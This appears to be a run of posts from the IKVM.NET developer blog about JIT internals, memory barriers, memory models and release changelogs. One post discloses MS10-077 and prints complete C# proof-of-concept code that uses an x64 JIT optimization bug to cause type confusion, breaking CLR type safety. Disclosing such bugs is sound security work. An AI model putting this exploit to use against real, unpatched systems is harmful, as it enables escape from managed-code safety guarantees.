# Sunday, 21 November 2010
How to Detect if a Method is Overridden

Suppose you want to know whether the class of a particular object overrides a virtual method. For an example of this, see OpenJDK's Thread.isCCLOverridden() (line 1573).

In Java the obvious way to do this would be to use reflection. On the CLR there is another way that is both more accurate [1] and more efficient.
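For comparison, the reflection approach can be sketched roughly as follows. This is a minimal illustration, not OpenJDK's actual code: the class name OverrideCheck and the helper overrides() are made up for this example, and it only handles public methods because it relies on Class.getMethod().

```java
import java.lang.reflect.Method;

final class OverrideCheck {
    /**
     * Returns true if the runtime class of obj (or one of its superclasses
     * below base) overrides the public method declared by base.
     * Hypothetical helper, for illustration only.
     */
    static boolean overrides(Object obj, Class<?> base, String name, Class<?>... params) {
        try {
            // getMethod() resolves to the most specific public declaration.
            Method m = obj.getClass().getMethod(name, params);
            return m.getDeclaringClass() != base;
        } catch (NoSuchMethodException e) {
            throw new IllegalArgumentException(e);
        }
    }

    public static void main(String[] args) {
        Thread plain = new Thread();
        Thread custom = new Thread() {
            @Override
            public ClassLoader getContextClassLoader() {
                return null;
            }
        };
        System.out.println(overrides(plain, Thread.class, "getContextClassLoader"));  // false
        System.out.println(overrides(custom, Thread.class, "getContextClassLoader")); // true
    }
}
```

Every call goes through a method lookup by name, which is the cost the CLR approach avoids.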

Here's the MSIL method from IKVM's java.lang.Thread.isCCLOverridden() implementation:

.method private hidebysig static bool isCCLOverridden(class java.lang.Thread A_0) cil managed
{
  ldftn      instance class java.lang.ClassLoader java.lang.Thread::getContextClassLoader()
  ldarg.0
  ldvirtftn  instance class java.lang.ClassLoader java.lang.Thread::getContextClassLoader()
  ceq
  ldftn      instance void java.lang.Thread::setContextClassLoader(class java.lang.ClassLoader)
  ldarg.0
  ldvirtftn  instance void java.lang.Thread::setContextClassLoader(class java.lang.ClassLoader)
  ceq
  and
  ldc.i4.0
  ceq
  ret
}

Instead of running a zillion instructions and accessing a lot of cold data for reflection, this simply leverages the information the JIT already has about virtual methods.

Here's the x86 code this turns into:

  push        ebp 
  mov         ebp,esp 
  push        esi 
  push        ebx 
  mov         esi,ecx 
  push        258F58h 
  mov         ecx,esi 
  mov         edx,259240h 
  call        JIT_VirtualFunctionPointer
  mov         edx,25DCA0h 
  cmp         eax,edx 
  sete        bl 
  movzx       ebx,bl 
  push        2591A0h 
  mov         ecx,esi 
  mov         edx,259240h 
  call        JIT_VirtualFunctionPointer
  mov         edx,25DCB0h 
  cmp         eax,edx 
  sete        al 
  movzx       eax,al 
  and         ebx,eax 
  sete        al 
  movzx       eax,al 
  pop         ebx 
  pop         esi 
  pop         ebp 
  ret

To get an idea what JIT_VirtualFunctionPointer does, take a look at the Shared Source CLI.

On the CLR, in the common case it only executes about 40 instructions.

The downside to this method is that it only works if you have an object instance, although you could use FormatterServices.GetUninitializedObject() to create one.

Why Optimize This?

In the OpenJDK code, isCCLOverridden() is only called if a SecurityManager is installed, but I wanted to always use it to avoid calling getContextClassLoader() during thread construction. That call would trigger the system class loader to be constructed, and my long-term goal for IKVM is to make initialization lazier to reduce the huge startup overhead.


[1] This method is more accurate (on the CLR) because you don't need to worry about non-virtual methods, virtual methods that are new (and hence don't override the base class virtual method), or explicit overrides that override a method but have a different name.

Update: See this article for a caveat.

Sunday, 21 November 2010 11:36:21 (W. Europe Standard Time, UTC+01:00)
# Wednesday, 17 November 2010
New Development Snapshot

Time for a new snapshot.

Changes:

  • Added support for using MethodImplAttribute as a Java annotation.
  • Fixed class name resolution for xml remapping instructions.
  • Many AWT fixes.
  • Fixed xml remapper to interpret empty sig attribute on call as zero length argument list.
  • Added memory barrier after volatile stores.
  • Added optimization to remove redundant memory barriers.
  • Changed default assembly class loader instantiation to avoid security manager check.
  • Fixed ikvm.exe -D property name parsing to accept properties with equals sign in the name.
  • Fixed JdbcOdbc provider to use Invariant Culture for Decimal/BigDecimal conversion.
  • Fixed column type mapping bugs in JdbcOdbcResultSetMetaData.
  • Fixed resource (and virtual class file) loading regression that caused loading resources from assemblies with an underscore in the name to fail.

Binaries available here: ikvmbin-0.45.3973.zip

Wednesday, 17 November 2010 09:08:33 (W. Europe Standard Time, UTC+01:00)
# Thursday, 11 November 2010
IKVM.NET 0.36 Update 3

At the request of an IKVM.NET user still stuck on .NET 1.1, the memory model fix has been backported to 0.36.

Changes:

  • Changed version to 0.36.0.14.
  • Emit a memory barrier after volatile stores.

Binaries available here: ikvmbin-0.36.0.14.zip
Sources (+ binaries): ikvm-0.36.0.14.zip

Thursday, 11 November 2010 07:09:06 (W. Europe Standard Time, UTC+01:00)
# Monday, 01 November 2010
C# Async CTP

Last week at the PDC Microsoft released a CTP of the upcoming C# (and VB.NET) async feature. When you install the Async CTP and run the code below with the current IKVM.NET release you'll see something like this:

7
Downloaded 64803 bytes
13

This means that after the async operation completed the method resumed on another thread. However, if you get the current IKVM.NET code from cvs, you'll see:

7
Downloaded 64803 bytes
7

Via the magic of SynchronizationContext the method now resumes on the AWT event thread, if the await happened on that thread.

Here's the demo:

using System;
using System.Threading;
using System.Net;
using java.awt;
using java.awt.@event;

class AsyncDemo : Frame, ActionListener
{
  AsyncDemo()
  {
    var button = new Button("Click Me");
    button.addActionListener(this);
    add(button);
    pack();
    setVisible(true);
  }

  public async void actionPerformed(ActionEvent ae)
  {
    Console.WriteLine(Thread.CurrentThread.ManagedThreadId);
    var wc = new WebClient();
    var data = await wc.DownloadDataTaskAsync("http://weblog.ikvm.net/");
    Console.WriteLine("Downloaded {0} bytes", data.Length);
    Console.WriteLine(Thread.CurrentThread.ManagedThreadId);
  }

  static void Main()
  {
    new AsyncDemo();
  }
}
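
The idea of resuming on the original thread is not specific to C#. As a rough Java analogy (not IKVM's implementation and not how SynchronizationContext is built), the sketch below posts the continuation back to a single-threaded executor. The class name ResumeOnEventThread, the thread name "event-thread" and the 1024-byte payload are all placeholders; the executor merely stands in for the AWT event thread.

```java
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

final class ResumeOnEventThread {
    /** Returns the thread names seen before and after the simulated await. */
    static String[] run() {
        // Hypothetical stand-in for the AWT event thread: one named worker.
        ExecutorService eventThread = Executors.newSingleThreadExecutor(r -> {
            Thread t = new Thread(r, "event-thread");
            t.setDaemon(true);
            return t;
        });
        String[] seen = new String[2];
        try {
            CompletableFuture
                // "Click handler" starts on the event thread.
                .supplyAsync(() -> {
                    seen[0] = Thread.currentThread().getName();
                    return 0;
                }, eventThread)
                // Simulated download runs elsewhere (default async pool).
                .thenApplyAsync(ignored -> new byte[1024])
                // The continuation is explicitly posted back to the event thread.
                .thenAcceptAsync(data -> seen[1] = Thread.currentThread().getName(), eventThread)
                .join();
        } finally {
            eventThread.shutdown();
        }
        return seen;
    }

    public static void main(String[] args) {
        String[] seen = run();
        System.out.println(seen[0]);
        System.out.println(seen[1]);
    }
}
```

In the C# version the compiler and SynchronizationContext do this posting implicitly; here it has to be spelled out by passing the executor.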

Monday, 01 November 2010 15:57:38 (W. Europe Standard Time, UTC+01:00)
# Tuesday, 26 October 2010
How to Hack Your Own JIT Intrinsic

Yesterday I wrote about Thread.MemoryBarrier() and some of its performance characteristics. I wanted to do some benchmarking to see whether mfence really is faster than a locked memory operation, but instead of writing a microbenchmark (which I had already done) I wanted to run code that was a little bit more "real". So I came up with a hack to allow mfence to be used in managed code. Please note that this is a hack and not something you should use outside of an experimental context. The code is available here.

The code includes a microbenchmark, but not the "real" benchmark (based on LinkedBlockingQueue) that I used.

I also tested a Pentium 4 class machine and a Core i7. On the Pentium 4 and my Core 2 Duo mfence wins out significantly, but on the Core i7 mfence is significantly slower, oddly enough.

How the Hack Works

The MemoryBarrierHack.cs file contains two classes, __Hack__DoNotUse and Program. The __Hack__DoNotUse class contains the MemoryBarrier method and a static constructor to patch the MemoryBarrier method. The MemoryBarrier method is patched to patch the call site of its caller and replace the call with an mfence and a mov al,imm8 as a filler. This means that when you want a memory barrier, you simply call the static method and when that call executes, the first time it will act as a memory barrier (because of the locked memory operation) and also patch the call so that the next time it will be an mfence instruction.

I built a modified IKVM runtime that uses this trick and used that to benchmark the LinkedBlockingQueue. On my system it showed a performance improvement of about 7% with mfence versus .NET 4.0's MemoryBarrier intrinsic.

Tuesday, 26 October 2010 11:50:03 (W. Europe Daylight Time, UTC+02:00)
# Monday, 25 October 2010
Memory Model Fix

In last week's 0.44.0.6 update I fixed a memory model bug. In retrospect it was a pretty dumb bug, but in my defence, even the easy parts of memory models are still pretty subtle and when I started IKVM.NET both the Java and CLR memory models were not very well documented.

First of all, I should thank Staffan Ulfberg for filing an exceptionally high quality bug report.

Finding the Problem

After spending some quality time in Windbg looking at the crash dump and with the java.util.concurrent sources, I was eventually able to reproduce the problem on a single CPU quad core Xeon (but not on my Core 2 laptop). Once it was reproducible I started pruning the repro to find the trouble spot and eventually found this method:

java.util.concurrent.AbstractQueuedSynchronizer.java
public final boolean release(int arg) {
  if (tryRelease(arg)) {
    Node h = head;
    if (h != null && h.waitStatus != 0)
      unparkSuccessor(h);
    return true;
  }
  return false;
}

My pruned version looked like this:

public final void release() {
  state = 0;
  Node h = head;
  if (h != null && h.waitStatus != 0)
    unparkSuccessor(h);
}

Both state and head are volatile fields. With this modified version the hang usually happened within a second, and I had also added a timeout to park so the problem could be seen repeatedly without restarting the process. After seeing this and thinking about it for a bit, I realized that if the read of head could be reordered with the write of state, that could cause the observed hang. To test that theory, I used Windbg to patch the running code to add an sfence instruction after the state = 0 store. That did indeed make the problem go away, and replacing the sfence with three nop instructions made it reappear.

Time to read up on the memory models.

Java Memory Model

For the Java memory model, the JSR 133 Cookbook is a good place to start. It has a nice table that confirms that the reordering isn't allowed in Java:

Can Reorder                  | 2nd operation
1st operation                | Normal Load / Normal Store | Volatile Load / MonitorEnter | Volatile Store / MonitorExit
Normal Load / Normal Store   |                            |                              | No
Volatile Load / MonitorEnter | No                         | No                           | No
Volatile Store / MonitorExit |                            | No                           | No

The yellow box (a volatile store followed by a volatile load) clearly says No :-)

CLR Memory Model

The CLR memory model is summarized nicely in this blog post by Joe Duffy and he explicitly calls out: "With this model, the only true case where you’d truly need the strength of a full-barrier provided by Rule 4 is to prevent reordering in the case where a store is followed by a volatile load. Without the barrier, the instructions may reorder."

So that confirmed that I did indeed need to emit a memory barrier between a volatile store and a subsequent load. I modified the bytecode compiler to emit a call to Thread.MemoryBarrier() after every volatile store.
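
To make the store, barrier, load pattern concrete, here is a rough Java analogy. It is not the code IKVM emits: it assumes Java 9 or later and uses VarHandle.fullFence() where IKVM calls Thread.MemoryBarrier(), and the class name StoreLoadFenceDemo and its helpers are made up for this sketch. The fields are deliberately plain (not volatile), so the only thing ordering each store before the following load is the explicit fence.

```java
import java.lang.invoke.VarHandle;
import java.util.concurrent.CyclicBarrier;

final class StoreLoadFenceDemo {
    // Plain (non-volatile) fields on purpose: the only ordering between the
    // store and the load below comes from the explicit fence.
    static int p1, p2, r1, r2;

    // Wraps the checked exceptions of CyclicBarrier.await().
    private static void sync(CyclicBarrier barrier) {
        try {
            barrier.await();
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

    /** Counts the rounds in which both threads read 0 from the other's flag. */
    static int countBothZero(int rounds) {
        CyclicBarrier barrier = new CyclicBarrier(2);
        Thread other = new Thread(() -> {
            for (int i = 0; i < rounds; i++) {
                p1 = 0;
                sync(barrier);          // both flags are reset
                p1 = 1;                 // store
                VarHandle.fullFence();  // the load below may not pass the store
                r1 = p2;                // load
                sync(barrier);          // both results are written
            }
        });
        other.start();
        int bothZero = 0;
        for (int i = 0; i < rounds; i++) {
            p2 = 0;
            sync(barrier);
            p2 = 1;
            VarHandle.fullFence();
            r2 = p1;
            sync(barrier);
            if (r1 == 0 && r2 == 0) {
                bothZero++;             // would mean a store/load pair was reordered
            }
        }
        try {
            other.join();
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
        }
        return bothZero;
    }

    public static void main(String[] args) {
        System.out.println("both zero: " + countBothZero(100000));
    }
}
```

With the fences in place at least one thread must observe the other's store, so the count should stay at zero. Removing the two fullFence() calls gives the hardware and the JIT permission to reorder, which is the situation the bug report exposed.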

CLI Memory Model

I explicitly chose not to support the CLI memory model, because it is not very well specified and is impossible to test against. I don't know what memory model Mono implements, but I did find that Thread.MemoryBarrier() was not implemented for x86.

Thread.MemoryBarrier() Implementation Issues

I picked Thread.MemoryBarrier() for 0.44 because it was the easiest and lowest risk fix. An alternative would be to use Interlocked.Exchange() to write to a volatile field. On .NET 2.0, Thread.MemoryBarrier() is implemented as a native method that does more work than just the memory barrier: it also polls for GC and acts as a safe point. On .NET 4.0 it has been turned into a JIT intrinsic and the overhead is lower. Unfortunately, on my system, the .NET 4.0 memory barrier is still significantly slower than the HotSpot memory barrier (which uses mfence), but apparently the trade-off between mfence and a locked instruction is not trivial.

Optimization

In the 0.45 code (where there is now an MSIL optimization step), I added an optimization to remove redundant memory barriers. If multiple volatile stores are done in succession, only the last one will get a memory barrier.
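
The effect of that optimization can be sketched as a tiny peephole pass. This is a simplified model, not IKVM's CodeEmitter: the class BarrierPeephole and its Op enum are hypothetical, and each volatile store is treated as a single instruction, whereas real MSIL has value-pushing instructions in between.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

final class BarrierPeephole {
    // Hypothetical, heavily simplified instruction set.
    enum Op { VOLATILE_STORE, MEMORY_BARRIER, VOLATILE_LOAD }

    /** Drops every barrier that is immediately followed by another volatile store. */
    static List<Op> removeRedundantBarriers(List<Op> code) {
        List<Op> out = new ArrayList<>();
        for (int i = 0; i < code.size(); i++) {
            Op op = code.get(i);
            boolean nextIsVolatileStore =
                i + 1 < code.size() && code.get(i + 1) == Op.VOLATILE_STORE;
            if (op == Op.MEMORY_BARRIER && nextIsVolatileStore) {
                continue; // the barrier after the following store covers this store too
            }
            out.add(op);
        }
        return out;
    }

    public static void main(String[] args) {
        List<Op> naive = Arrays.asList(
            Op.VOLATILE_STORE, Op.MEMORY_BARRIER,
            Op.VOLATILE_STORE, Op.MEMORY_BARRIER,
            Op.VOLATILE_LOAD);
        // prints [VOLATILE_STORE, VOLATILE_STORE, MEMORY_BARRIER, VOLATILE_LOAD]
        System.out.println(removeRedundantBarriers(naive));
    }
}
```

Only the barrier between the two stores is dropped; the one separating the last store from the following load stays, because that is the pair that must not be reordered.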

Testing

Finally, here's a small test that reproduces the problem (on my Core 2 laptop):

class Rendezvous extends java.util.concurrent.atomic.AtomicInteger {
  private static final int PARTIES = 2;

  public final void await() {
    if (incrementAndGet() == PARTIES) {
      compareAndSet(PARTIES, 0);
      return;
    }
    while (get() != 0) ;
  }
}

public class test {
  static volatile int p1;
  static volatile int p2;
  static volatile int r1;
  static volatile int r2;
  static final Rendezvous rv1 = new Rendezvous();
  static final Rendezvous rv2 = new Rendezvous();

  public static void main(String[] args) {
    Thread t = new Thread() {
      public void run() {
        for (; ; ) {
          p1 = 0;
          rv1.await();

          p1 = 1;
          r1 = p2;

          rv2.await();
        }
      }
    };
    t.start();

    for (int i = 0; i < 1000000; i++) {
      p2 = 0;
      rv1.await();

      p2 = 1;
      r2 = p1;

      rv2.await();

      if (r1 == 0 && r2 == 0)
        System.out.println("Oops! i = " + i);
    }

    t.stop();
  }
}

Monday, 25 October 2010 08:58:57 (W. Europe Daylight Time, UTC+02:00)
# Friday, 22 October 2010
MS10-077 Vulnerability Details

Last week Microsoft released MS10-077. Here are the details.

Coincidentally I found this vulnerability in the .NET 4.0 RC on the day that .NET 4.0 went RTM (April 12, 2010) and the next day confirmed that RTM was also affected and reported it to MSRC.

It's not really a very interesting vulnerability, just a bug in an optimization that the x64 JIT does. Here's the code to exploit it:

using System;
using System.Runtime.CompilerServices;
class Union1
{
  internal volatile int i;
  internal volatile int j;
}
class Union2
{
  internal volatile object o;
  internal volatile int[] arr;
}
class Program
{
  static Union1 union1 = new Union1();
  static Union2 union2;
  class Base
  {
    public virtual Base Get()
    {
      return null;
    }
  }
  class Derived : Base
  {
    public Union2 i;
  }
  class MyDerived : Derived
  {
    public override Base Get()
    {
      return new MyBase();
    }
  }
  class MyBase : Base
  {
    object foo = union1;
  }
  [MethodImpl(MethodImplOptions.NoInlining)]
  static void x64_JIT_Bug(Derived d)
  {
    Base b = d;
  loop:
    if (b != null)
    {
      if (b is Derived)
      {
        Oops((Derived)b);
      }
      b = b.Get();
      goto loop;
    }
  }
  static void Oops(Derived d)
  {
    union2 = d.i;
  }
  static void Main()
  {
    x64_JIT_Bug(new MyDerived());
    Console.WriteLine(union1);
    Console.WriteLine(union2);
  }
}

The bug is in x64_JIT_Bug. The "b is Derived" test and "(Derived)" cast are incorrectly optimized away.

Friday, 22 October 2010 14:02:12 (W. Europe Daylight Time, UTC+02:00)
IKVM.NET 0.44 Update 1 RC 0

Time for a refresh of 0.44 with some bug fixes.

Changes:

  • Changed version to 0.44.0.6
  • Backported various build system improvements.
  • Backported IKVM.Reflection ILGenerator exception table sorting bug fix (when running on Mono).
  • Backported Mono 2.8 mcs build workarounds.
  • Backported support for boolean, byte, char and short non-final static field constant attributes.
  • Backported core assembly detection fix.
  • Backported fix to make sure that ikvmc (and ikvmstub) can find assemblies that are part of a multi assembly (shared class loader) group (if the assembly is in the same directory as the main assembly of the group).
  • Backported fix for regression in stack trace printing of .NET (not remapped) exceptions introduced in 0.44. The .NET stack trace should not be included in the message.
  • Backported fix for ikvmc sometimes incorrectly handling InternalsVisibleToAttributes in multi assembly builds.
  • Backported fix for regression introduced with fault handlers. Exception handlers inside fault handlers could be ignored.
  • Backported fix for #3086040. Volatile stores require a memory barrier.

Binary available here: ikvmbin-0.44.0.6.zip

Sources: ikvmsrc-0.44.0.6.zip, openjdk6-b18-stripped.zip

Friday, 22 October 2010 10:25:42 (W. Europe Daylight Time, UTC+02:00)
# Friday, 15 October 2010
New Development Snapshot

Time for a new snapshot. No major theme this time, but lots of bug fixes and some new infrastructure for doing more MSIL optimizations. Volker added the Nimbus L&F.

Changes:

  • Moved local variable analysis from verifier into a separate pass.
  • Restructured method analyzer/verifier to make data flow more obvious and keep less data alive during compilation.
  • Various minor refactorings and clean up.
  • Changed workaround for gmcs inability to properly deal with two-pass compilation of mutually dependent assemblies to use reflection, because the previous workaround now also fails on Mono 2.8.
  • Fixed reflection method invocation issue: Always wrap InvocationTargetException in another InvocationTargetException, to handle the case where a method is recursively calling itself.
  • Added support for boolean, byte, char and short non-final static field constant attributes.
  • Implemented create() for ButtonPeer and LabelPeer.
  • Implemented first stab at converting suitable fault blocks into finally blocks.
  • Changed CodeEmitter to build intermediate store of MSIL code to allow post-processing optimization steps.
  • Added endfinally opcode support to xml remapper.
  • Changed xml remapper to require explicit exits in exception blocks.
  • Moved ikvmc core assembly detection to the right place, to avoid problems when a non-main assembly of the core assembly set is explicitly referenced.
  • Fix to make sure that ikvmc (and ikvmstub) can find assemblies that are part of a multi assembly (shared class loader) group (if the assembly is in the same directory as the main assembly of the group).
  • Fix a rounding problem with FontMetrics.
  • Implemented createCompatibleVolatileImage() for Nimbus.
  • Implemented Graphics.setPaint() with a LinearGradientPaint for Nimbus.
  • Added Nimbus L&F.
  • Fixed threading problem in font metrics code.
  • Fixed regression in stack trace printing of .NET (not remapped) exceptions introduced in 0.44. The .NET stack trace should not be included in the message.
  • Fixed ikvmc bug. Before saving any of the output assemblies, we should first finish all of them (because InternalsVisibleToAttributes may be added as a side effect of compiling code in another assembly).
  • Fixed regression in SocketInputStream.read(). The offset into the byte array was ignored.
  • Use rendering hints of FontMetrics for drawGlyphVector.
  • Fixed regression introduced with fault handlers. Exception handlers inside fault handlers could be ignored.
  • Added some experimental MSIL optimizations to CodeEmitter. They can be enabled by setting the IKVM_EXPERIMENTAL_OPTIMIZATIONS environment variable.
  • Added error handling for -remap file errors to ikvmc.
  • IKVM.Reflection: Fixed ILGenerator to throw a NotSupportedException if a branch offset doesn't fit (i.e. when a short form branch is used inappropriately).
  • IKVM.Reflection: Added exception message for backward branch constraints violations.
  • IKVM.Reflection: Fixed ILGenerator to properly sort exception table when running on Mono.

Binaries available here: ikvmbin-0.45.3940.zip

Friday, 15 October 2010 06:32:16 (W. Europe Daylight Time, UTC+02:00)
# Friday, 10 September 2010
New Development Snapshot

I've started on IPv6 support. The classic socket APIs (i.e. the java.net package) now support IPv6. At the moment it is .NET only, because Mono on Windows doesn't appear to support IPv6 and on Linux you apparently cannot bind both an IPv4 and IPv6 socket to the same port at the same time (suggestions on this are welcome).

The implementation is based on a relatively straightforward port of the OpenJDK files TwoStacksPlainDatagramSocketImpl.c and TwoStacksPlainSocketImpl.c to Java. I wrote a Java Winsock API wrapper on top of the .NET Socket API (which in turn is a wrapper on the actual Winsock API). In the future the OpenJDK DualStack code should also be ported, for use on Vista/Win7 and probably Linux.

What remains to be done is update the nio socket code to support IPv6.

Changes:

  • Added some missing resources to IKVM.OpenJDK.Tools.dll.
  • Removed x64 JIT bug workaround that triggered another x64 bug.
  • Implemented IPv6 support (.NET only) for java.net package APIs.
  • Several fixes/improvements to java.net.NetworkInterface.
  • Implemented Graphics.drawImage() with AffineTransform.
  • Improved StandardGlyphVector.
  • FontMetrics fixes.
  • Inet[4|6]AddressImpl.lookupAllHostAddr() should throw UnknownHostException instead of returning an empty array.
  • Don't expose IPv6 network interface addresses when IPv6 isn't enabled.
  • Added workaround for Mono TimeZoneInfo bug.
  • Fix build on Linux.
  • Fixed java.lang.Thread to synchronize on private lock instead of Thread object in thread startup code, to avoid potential deadlock with user code.
  • Added check to make sure that vfs.zip exists, before building second pass version of IKVM.Runtime.dll, because it appears that mcs doesn't complain about missing resources.
  • Fixed bug #3056721.
  • Added explanatory message to Link Error if it is caused by a missing reference.

Binaries available here: ikvmbin-0.45.3905.zip

Friday, 10 September 2010 11:44:21 (W. Europe Daylight Time, UTC+02:00)